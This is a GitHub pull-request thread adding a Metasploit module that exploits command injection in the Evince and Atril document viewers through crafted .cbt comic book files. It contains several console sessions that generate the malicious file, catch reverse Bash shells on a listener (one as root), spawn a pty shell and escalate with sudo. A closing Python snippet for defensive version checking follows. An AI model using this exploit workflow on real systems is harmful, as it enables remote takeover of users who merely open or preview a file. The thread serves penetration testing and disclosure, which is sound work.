Add Evince CBT File Command Injection module #11349

Merged
merged 3 commits into rapid7:master from bcoles:evince_cbt_cmd_injection on Feb 6, 2019

2 participants
@bcoles
Contributor

bcoles commented Feb 3, 2019

Add Evince CBT File Command Injection module.

    This module exploits a command injection vulnerability in Evince
    before version 3.24.1 when opening comic book `.cbt` files.

    Some file manager software, such as Nautilus and Atril, may allow
    automatic exploitation without user interaction due to thumbnailer
    preview functionality.

    Note that limited space is available for the payload (<256 bytes).
    Reverse Bash and Reverse Netcat payloads should be sufficiently small.

    This module has been tested successfully on evince versions:

    3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;
    3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.

Output

msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection 
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run

[*] Writing file: msf.cbt (1078272 bytes) ...
[+] msf.cbt stored at /root/.msf4/local/msf.cbt
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www
[*] exec: mv /root/.msf4/local/msf.cbt /var/www

msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/handler) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.160:39362) at 2019-02-03 00:16:59 -0500

id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
uname -a
Linux ubuntu-16-04-x64 4.4.0-140-generic #166-Ubuntu SMP Wed Nov 14 20:09:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

@bcoles bcoles added module docs labels Feb 3, 2019

@pbarry-r7 pbarry-r7 self-assigned this Feb 6, 2019

@pbarry-r7

Contributor

pbarry-r7 commented Feb 6, 2019

Works fine for me using Kali 1.0.6 as a target:

msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 192.168.56.99
lhost => 192.168.56.99
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run

[*] Writing file: msf.cbt (1090048 bytes) ...
[+] msf.cbt stored at /home/vagrant/.msf4/local/msf.cbt
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/handler) > set lhost 192.168.56.99
lhost => 192.168.56.99
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.99:4444 
[*] Command shell session 1 opened (192.168.56.99:4444 -> 192.168.56.102:45446) at 2019-02-06 21:26:34 +0000

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root

Will land here shortly. Thx, @bcoles!

@pbarry-r7 pbarry-r7 merged commit 6f31b1a into rapid7:master Feb 6, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

pbarry-r7 added a commit that referenced this pull request Feb 6, 2019

msjenkins-r7 added a commit that referenced this pull request Feb 6, 2019

@bcoles bcoles deleted the bcoles:evince_cbt_cmd_injection branch Feb 7, 2019

@pbarry-r7

Contributor

pbarry-r7 commented Feb 7, 2019

Release Notes

This adds the exploits/multi/fileformat/evince_cbt_cmd_injection module to framework, targeting vulnerable versions of Evince (a document viewer application) for command injection. Users can select this module to create a "comic book" .cbt file, containing a small payload, which will execute when the .cbt file is opened with Evince.

@bcoles

Contributor Author

bcoles commented Feb 9, 2019

It's worth noting that the atril package is vulnerable and exploitable. By default atril is not installed on Ubuntu Desktop.

At time of writing, this vulnerability is still exploitable with atril on a fully up-to-date Ubuntu 18.04.1 system.

# ./msfconsole 
[-] ***rting The Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

   _______________                        |*\_/*|________
  |  ___________  |     .-.     .-.      ||_/-\_|______  |
  | |           | |    .****. .****.     | |           | |
  | |   0   0   | |    .*****.*****.     | |   0   0   | |
  | |     -     | |     .*********.      | |     -     | |
  | |   \___/   | |      .*******.       | |   \___/   | |
  | |___     ___| |       .*****.        | |___________| |
  |_____|\_/|_____|        .***.         |_______________|
    _|__|/ \|_|_.............*.............._|________|_
   / ********** \                          / ********** \
 /  ************  \                      /  ************  \
--------------------                    -------------------


       =[ metasploit v5.0.6-dev-3387c53                   ]
+ -- --=[ 1874 exploits - 1057 auxiliary - 327 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection 
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run

[*] Writing file: msf.cbt (1048064 bytes) ...
[+] msf.cbt stored at /root/.msf4/local/msf.cbt
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > handler -p cmd/unix/reverse_bash -H 172.16.191.188 -P 4444 
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 172.16.191.188:4444 
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www
[*] exec: mv /root/.msf4/local/msf.cbt /var/www

msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > [*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.166:50604) at 2019-02-08 21:36:25 -0500

msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > sessions -i 1
[*] Starting interaction with 1...

cat /etc/issue
Ubuntu 18.04.1 LTS \n \l

evince --version
GNOME Document Viewer 3.28.4
atril --version
MATE Document Viewer 1.20.1
apt show atril

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

Package: atril
Version: 1.20.1-2ubuntu2
Priority: optional
Section: universe/x11
Origin: Ubuntu
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
Original-Maintainer: Debian+Ubuntu MATE Packaging Team <debian-mate@lists.debian.org>
Bugs: https://bugs.launchpad.net/ubuntu/+filebug
Installed-Size: 676 kB
Provides: djvu-viewer, pdf-viewer, postscript-viewer
Depends: atril-common (>= 1.20.1-2ubuntu2), libatrildocument3 (= 1.20.1-2ubuntu2), libatrilview3 (= 1.20.1-2ubuntu2), mate-desktop-common, shared-mime-info, dconf-gsettings-backend | gsettings-backend, libatk1.0-0 (>= 1.12.4), libc6 (>= 2.4), libcaja-extension1 (>= 1.6.3), libgdk-pixbuf2.0-0 (>= 2.22.0), libglib2.0-0 (>= 2.37.3), libgtk-3-0 (>= 3.21.4), libice6 (>= 1:1.0.0), libsecret-1-0 (>= 0.7), libsm6, libxml2 (>= 2.7.4)
Recommends: default-dbus-session-bus | dbus-session-bus, gvfs
Suggests: caja, poppler-data, unrar
Breaks: libatrildocument3 (<< 1.13.0)
Replaces: libatrildocument3 (<< 1.13.0)
Homepage: http://www.mate-desktop.org/
Task: xubuntu-desktop, ubuntukylin-desktop, ubuntu-mate-core, ubuntu-mate-desktop
Supported: 3y
Download-Size: 177 kB
APT-Manual-Installed: yes
APT-Sources: http://au.archive.ubuntu.com/ubuntu bionic/universe amd64 Packages
Description: MATE document viewer
 Atril is a simple multi-page document viewer.  It can display and print
 PostScript (PS), Encapsulated PostScript (EPS), DJVU, DVI and Portable
 Document Format (PDF) files.
 .
 When supported by the document, it also allows searching for text, copying
 text to the clipboard, hypertext navigation, and table-of-contents
 bookmarks.


python3 -c 'import pty; pty.spawn("/bin/sh")'   
$ sudo /bin/bash
sudo /bin/bash
[sudo] password for user: password

root@ubuntu-18-1-x64:~# apt-get update && apt-get dist-upgrade
apt-get update && apt-get dist-upgrade
Hit:1 http://au.archive.ubuntu.com/ubuntu bionic InRelease
Hit:2 http://au.archive.ubuntu.com/ubuntu bionic-updates InRelease             
Hit:3 http://au.archive.ubuntu.com/ubuntu bionic-backports InRelease           
Get:4 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB]    
Fetched 88.7 kB in 5s (17.2 kB/s)   
Reading package lists... Done
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
0 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.
root@ubuntu-18-1-x64:~# 
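A defender-side version triage, added here as an example and not code from the PR or the module: it implements dpkg's version ordering so that package versions like those listed in the commit message (3.4.0-3.1, 3.18.2-1ubuntu4.3) and the `--version` lines shown in this thread can be compared with the 3.24.1 cutoff, and it deliberately never reports atril as fixed, since the thread shows atril 1.20.1 still exploitable on an up-to-date Ubuntu 18.04.1 without naming a fixed release. It assumes the distribution has not backported the fix under an unchanged version string; where it has, the result must be confirmed against the vendor changelog.

```python
import re
from itertools import zip_longest

FIXED_EVINCE = "3.24.1"  # PR text: Evince before 3.24.1 is affected; no fixed atril release is named
VERSION_RE = re.compile(r"(GNOME|MATE) Document Viewer (\S+)")  # evince/atril --version output

def _order(c):  # dpkg weight: '~' < end-of-string < letters < other symbols
    if c == "~":
        return -1
    return 0 if c == "" else (ord(c) if c.isalpha() else ord(c) + 256)

def _cmp_nondigit(a, b):
    for ca, cb in zip_longest(a, b, fillvalue=""):
        if _order(ca) != _order(cb):
            return _order(ca) - _order(cb)
    return 0

def _cmp_frag(a, b):
    """dpkg's verrevcmp: alternate non-digit runs (by _order) and digit runs (numerically)."""
    while a or b:
        ma, mb = re.match(r"\D*", a), re.match(r"\D*", b)
        r = _cmp_nondigit(ma.group(), mb.group())
        a, b = a[ma.end():], b[mb.end():]
        ma, mb = re.match(r"\d*", a), re.match(r"\d*", b)
        r = r or int(ma.group() or 0) - int(mb.group() or 0)
        if r:
            return r
        a, b = a[ma.end():], b[mb.end():]
    return 0

def dpkg_cmp(v1, v2):
    """Compare [epoch:]upstream[-revision] strings; negative means v1 sorts before v2."""
    def parts(v):
        m = re.fullmatch(r"(?:(\d+):)?(.*?)(?:-([^-]*))?", v)
        return int(m.group(1) or 0), m.group(2), m.group(3) or "0"
    (e1, u1, r1), (e2, u2, r2) = parts(v1), parts(v2)
    return (e1 - e2) or _cmp_frag(u1, u2) or _cmp_frag(r1, r2)

def assess(package, version):
    """evince: 'vulnerable' below the fix, else 'fixed'; atril: 'unknown' (PR reports 1.20.1 still
    exploitable, no fix named). A distro backport keeping the old version string is misreported."""
    if package == "evince":
        return "vulnerable" if dpkg_cmp(version, FIXED_EVINCE) < 0 else "fixed"
    return "unknown"

def assess_version_output(line):
    """Classify one `--version` line, e.g. 'GNOME Document Viewer 3.28.4'."""
    m = VERSION_RE.search(line)
    return assess("evince" if m.group(1) == "GNOME" else "atril", m.group(2)) if m else "unknown"
```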